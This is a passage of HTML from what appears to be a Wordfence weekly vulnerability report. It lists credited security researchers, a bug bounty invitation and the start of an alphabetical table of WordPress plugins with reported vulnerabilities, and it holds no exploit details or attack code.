					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/evan-nr" target="_blank" rel="noopener">Evan NR</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d432fe617c91ad68889cf3ec76b46d4e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d432fe617c91ad68889cf3ec76b46d4e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala (Stranger825)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/589361e53213285d6f9cd95562a5756a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="589361e53213285d6f9cd95562a5756a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-matte" target="_blank" rel="noopener">Revanth Matte</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/babyhack" target="_blank" rel="noopener">babyhack</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a353e86239973656255a46cde8db60f9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a353e86239973656255a46cde8db60f9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anthony-green-of-greenhat-security" target="_blank" rel="noopener">Anthony Green of Greenhat Security</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5b8726ae82351dd0bfb38b9e77fb8b99.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5b8726ae82351dd0bfb38b9e77fb8b99"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luerader" target="_blank" rel="noopener">LueRader</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6850e6e9fde2fb4afa5c90fd6bb8b6c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6850e6e9fde2fb4afa5c90fd6bb8b6c9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohammed-abd-alrahman" target="_blank" rel="noopener">Mohammed Abd Alrahman</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/99019555030c5f43e8795fe73e9d493c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="99019555030c5f43e8795fe73e9d493c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dark-mode" target="_blank" rel="noopener">normaandersonfrank</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6864a3370bb7095d718900423ff6139c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6864a3370bb7095d718900423ff6139c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farrukh-ziyaev" target="_blank" rel="noopener">Farrukh Ziyaev</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2dafc4d6717255667d167708bfc6f6bb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2dafc4d6717255667d167708bfc6f6bb"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitre-osman-hussein" target="_blank" rel="noopener">Mitre Osman Hussein</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7e44c1d5ad8f406fc10e62f0a5b11655.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7e44c1d5ad8f406fc10e62f0a5b11655"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jarno-vos" target="_blank" rel="noopener">Jarno Vos (jarnovos)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7a20dc8052800060e8c14c1aa309a8f7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7a20dc8052800060e8c14c1aa309a8f7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/koreainfosec" target="_blank" rel="noopener">KoreaInfoSec</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f8cc4fa628b6308e7c5c94d3bb19b2cc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f8cc4fa628b6308e7c5c94d3bb19b2cc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah" target="_blank" rel="noopener">Nasur ullah</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/74ec76c9927875b63c4e7a78a1f8b00f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="74ec76c9927875b63c4e7a78a1f8b00f"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sebastian-albrecht" target="_blank" rel="noopener">Sebastian Albrecht</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a225f8891b057a07c984d7d3796cb41f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a225f8891b057a07c984d7d3796cb41f"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revblock" target="_blank" rel="noopener">revblock</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7faaaafa0bfd93340fbe2a85b731478a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7faaaafa0bfd93340fbe2a85b731478a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ivaylo-atanassov-2" target="_blank" rel="noopener">Ivaylo Atanassov</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6fb51fd3550544e83c4b87c5131919f9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6fb51fd3550544e83c4b87c5131919f9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mutantgun" target="_blank" rel="noopener">Mutantgun</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d56703f4521f4d0dfebc1f75d67ad418.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d56703f4521f4d0dfebc1f75d67ad418"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-spataru" target="_blank" rel="noopener">Alex Spataru</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/45191b846983773cb044799b2c43ff23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="45191b846983773cb044799b2c43ff23"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuln-seeker-cyber-security-team" target="_blank" rel="noopener">Vuln Seeker Cyber Security Team</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cdd8ad43839b3daf1946313906d03f15.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cdd8ad43839b3daf1946313906d03f15"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/maarten" target="_blank" rel="noopener">Maarten</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f7a401ff0c9706d16cdb8dd3bdf72a6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f7a401ff0c9706d16cdb8dd3bdf72a6b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener">Spy0x7</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4e29654daa4a2049cec375b97c8ef638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e29654daa4a2049cec375b97c8ef638"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osman" target="_blank" rel="noopener">Osman Hussein</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/fd2bb32309c445d4b78303e1a770ded0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fd2bb32309c445d4b78303e1a770ded0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huynh-kien-minh-minhhk" target="_blank" rel="noopener">Huynh Kien Minh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8f890e7196b947d2121d63088d39a2fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8f890e7196b947d2121d63088d39a2fa"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hanh-nguyen" target="_blank" rel="noopener">DungNhi</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/795788b737d92810c0c19e0512745692.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="795788b737d92810c0c19e0512745692"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pervinzahidli" target="_blank" rel="noopener">pervinzahidli</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b4ada50fdfd87b78eae518aca8950c13.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b4ada50fdfd87b78eae518aca8950c13"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/salua-es-sair" target="_blank" rel="noopener">Salúa Es-sair</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4c2bd6964b38518385c4e8d1791fd762.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c2bd6964b38518385c4e8d1791fd762"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaim" target="_blank" rel="noopener">zaim</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/eefe3705b8f48b48303d7a95fe7a0ec3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="eefe3705b8f48b48303d7a95fe7a0ec3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adrien-brunner" target="_blank" rel="noopener">Adrien Brunner</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7fe5317595b8e4f4fe5505d7bb59d8cc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7fe5317595b8e4f4fe5505d7bb59d8cc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez" target="_blank" rel="noopener">Pablo González</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/194d5edb5df95ed8b7295c13d737c8c1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="194d5edb5df95ed8b7295c13d737c8c1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez" target="_blank" rel="noopener">Francisco José Ramírez</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/355ce104d8d84334b00aeb894b98d99d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="355ce104d8d84334b00aeb894b98d99d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/20kilograma" target="_blank" rel="noopener">20kilograma</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1ff6f83f830b125bfe22fa490eb2bfe7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1ff6f83f830b125bfe22fa490eb2bfe7"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hieupenguinnn" target="_blank" rel="noopener">HieuPenguinnn</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c4c7257eabfabcbfa54be7eb5b7dd68c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c4c7257eabfabcbfa54be7eb5b7dd68c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/turbonexic" target="_blank" rel="noopener">TurboNexic</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c451f7be2150d3f56bd9dd4de4f1998b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c451f7be2150d3f56bd9dd4de4f1998b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/achmad-adhikara" target="_blank" rel="noopener">adhikara13</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5234641298b9f3014d010ae4f0f01075.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5234641298b9f3014d010ae4f0f01075"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tony-harris" target="_blank" rel="noopener">Tony Harris</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
</table>
<p><em>Are you a security researcher who would like to be featured in our weekly vulnerability report?</em> You can responsibly disclose your WordPress vulnerability discoveries to us and earn a bounty on in-scope vulnerabilities <a href="https://www.wordfence.com/threat-intel/vulnerabilities/submit/" target="_blank" rel="noopener">through our Bug Bounty Program</a>. Responsibly disclosing your vulnerability discoveries to us will also get your name added on the <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/" target="_blank" rel="noopener">Wordfence Intelligence leaderboard</a> along with being mentioned in our weekly vulnerability report.</p>
<hr>
<h3>WordPress Plugins with Reported Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table software-list">
<tr>
<th class="text-center w-50">Software Name</th>
<th class="text-center">Software Slug</th>
</tr>
<tr>
<td>AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acymailing" target="_blank" rel="noopener">acymailing</a>
		</td>
</tr>
<tr>
<td>Advanced Contact form 7 DB</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-cf7-db" target="_blank" rel="noopener">advanced-cf7-db</a>
		</td>
</tr>
<tr>
<td>Advanced Customized Prompts</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-customized-prompts" target="_blank" rel="noopener">advanced-customized-prompts</a>
		</td>
</tr>
<tr>
<td>Advanced Partial Payment or Deposit for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-partial-payment-or-deposit-for-woocommerce" target="_blank" rel="noopener">advanced-partial-payment-or-deposit-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Advanced Product Fields Extended for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-product-fields-for-woocommerce-extended" target="_blank" rel="noopener">advanced-product-fields-for-woocommerce-extended</a>
		</td>
</tr>
<tr>
<td>AI Builder – Generate pages, blocks, images &amp; translate with AI</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-builder" target="_blank" rel="noopener">ai-builder</a>
		</td>
</tr>
<tr>
<td>Aruba HiSpeed Cache</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/aruba-hispeed-cache" target="_blank" rel="noopener">aruba-hispeed-cache</a>
		</td>
</tr>
<tr>
<td>Awesome Support – WordPress HelpDesk &amp; Support Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/awesome-support" target="_blank" rel="noopener">awesome-support</a>
		</td>
</tr>
<tr>
<td>BackWPup – WordPress Backup &amp; Restore Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup" target="_blank" rel="noopener">backwpup</a>
		</td>
</tr>
<tr>
<td>bbPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bbpress" target="_blank" rel="noopener">bbpress</a>
		</td>
</tr>
<tr>
<td>BEAR – Bulk Editor for WooCommerce Professional. AI assistant on board (MCP Server)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-bulk-editor" target="_blank" rel="noopener">woo-bulk-editor</a>
		</td>
</tr>
<tr>
<td>Beaver Builder Page Builder – Drag and Drop Website Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/beaver-builder-lite-version" target="_blank" rel="noopener">beaver-builder-lite-version</a>
		</td>
</tr>
<tr>
<td>Bold Page Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bold-page-builder" target="_blank" rel="noopener">bold-page-builder</a>
		</td>
</tr>
<tr>
<td>Bold Timeline Lite</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bold-timeline-lite" target="_blank" rel="noopener">bold-timeline-lite</a>
		</td>
</tr>
<tr>
<td>Booking for Appointments and Events Calendar – Amelia</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">ameliabooking</a>
		</td>
</tr>
<tr>
<td>Bookit — Booking &amp; Appointment Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookit" target="_blank" rel="noopener">bookit</a>
		</td>
</tr>
<tr>
<td>Booktics – Appointment Booking Calendar for Service Businesses</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booktics" target="_blank" rel="noopener">booktics</a>
		</td>
</tr>
<tr>
<td>BuddyPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress" target="_blank" rel="noopener">buddypress</a>
		</td>
</tr>
<tr>
<td>Builderall for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/builderall-cheetah-for-wp" target="_blank" rel="noopener">builderall-cheetah-for-wp</a>
		</td>
</tr>
<tr>
<td>Bulk Password Reset</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bulk-password-reset" target="_blank" rel="noopener">bulk-password-reset</a>
		</td>
</tr>
<tr>
<td>CatalogX – Catalog Mode, Enquiry &amp; Quotes for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-catalog-enquiry" target="_blank" rel="noopener">woocommerce-catalog-enquiry</a>
		</td>
</tr>
<tr>
<td>Checkout Custom Fields Builder for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/checkout-custom-fields-builder-for-woocommerce" target="_blank" rel="noopener">checkout-custom-fields-builder-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>CODE MONKEYS PROPOSALS – Easily create client proposals from your WordPress admin dashboard</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/code-monkeys-proposals" target="_blank" rel="noopener">code-monkeys-proposals</a>
		</td>
</tr>
<tr>
<td>Contact Form to Chat Apps | Click to Chat to Order – FormyChat</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/social-contact-form" target="_blank" rel="noopener">social-contact-form</a>
		</td>
</tr>
<tr>
<td>Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contact-form-to-db" target="_blank" rel="noopener">contact-form-to-db</a>
		</td>
</tr>
<tr>
<td>Content Mask</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/content-mask" target="_blank" rel="noopener">content-mask</a>
		</td>
</tr>
<tr>
<td>CoolClock</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/coolclock" target="_blank" rel="noopener">coolclock</a>
		</td>
</tr>
<tr>
<td>CryptoPayment Gateway</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cryptopayment-gateway" target="_blank" rel="noopener">cryptopayment-gateway</a>
		</td>
</tr>
<tr>
<td>Csomagpontok és Címkék WooCommerce-hez</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hungarian-pickup-points-for-woocommerce" target="_blank" rel="noopener">hungarian-pickup-points-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Custom Menu Wizard Widget</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-menu-wizard" target="_blank" rel="noopener">custom-menu-wizard</a>
		</td>
</tr>
<tr>
<td>Direct Download for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/direct-download-for-woocommerce" target="_blank" rel="noopener">direct-download-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Domain For Sale – Landing Page Per Domain, Domain Mapping, Offers &amp; Listings</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/domain-for-sale" target="_blank" rel="noopener">domain-for-sale</a>
		</td>
</tr>
<tr>
<td>Drag and Drop File Upload for Elementor Forms</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/drag-and-drop-file-upload-for-elementor-forms" target="_blank" rel="noopener">drag-and-drop-file-upload-for-elementor-forms</a>
		</td>
</tr>
<tr>
<td>DT LMS – elearning,  WordPress LMS Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dt-lms-lite" target="_blank" rel="noopener">dt-lms-lite</a>
		</td>
</tr>
<tr>
<td>Easy Appointments</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">easy-appointments</a>
		</td>
</tr>
<tr>
<td>Easy Google Fonts</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-google-fonts" target="_blank" rel="noopener">easy-google-fonts</a>
		</td>
</tr>
<tr>
<td>EDD Product Catalog Feed by PixelYourSite</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/edd-products-feed-pro" target="_blank" rel="noopener">edd-products-feed-pro</a>
		</td>
</tr>
<tr>
<td>ElasticPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/elasticpress" target="_blank" rel="noopener">elasticpress</a>
		</td>
</tr>
<tr>
<td>ELEX WooCommerce Request a Quote</td>
<td>
